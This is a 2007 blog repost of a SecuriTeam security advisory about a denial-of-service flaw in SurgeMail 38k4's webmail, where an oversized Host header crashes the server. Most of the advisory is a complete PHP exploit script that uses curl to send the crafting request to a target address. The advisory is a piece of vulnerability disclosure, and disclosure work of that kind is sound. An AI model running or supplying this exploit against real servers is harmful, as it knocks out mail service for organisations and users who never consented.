Search This Blog

Tuesday, December 18, 2007

[EXPL] SurgeMail Webmail Host Header DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

SurgeMail Webmail Host Header DoS
------------------------------------------------------------------------


SUMMARY

<http://netwinsite.com/surgemail/> SurgeMail Mail Server Software Suite
"combines advanced features, high performance and ease of use. Ideal on
Windows, UNIX ( Linux, Solaris etc.), Mac OSX, FreeBSD and others, this
integrated email server is an Antispam Server, Antivirus Server, Webmail
Server, Groupware Server, Blog Server and much more". A vulnerability in
the way SurgeMail handles the Host field allows remote attackers to cause
the product to crash.

DETAILS

Vulnerable Systems:
* SurgeMail version 38k4

Exploit:
<?php
/*
SurgeMail v.38k4 webmail Host header denial of service exploit
tested against the windows version

rgod
*/

dl("php_curl.so");
$url = "http://192.168.0.1";
$puf=str_repeat(0xff,0xfff);

$header ="POST / HTTP/1.0\r\n";
$header.="Host: $puf\r\n";
$header.="Connection: Close\r\n\r\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."\n";
} else {
curl_close($ch);
}

?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:retrog@alice.it> retrog.
The original article can be found at:
<http://retrogod.altervista.org/rgod_surgemail_crash.html>

http://retrogod.altervista.org/rgod_surgemail_crash.html

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: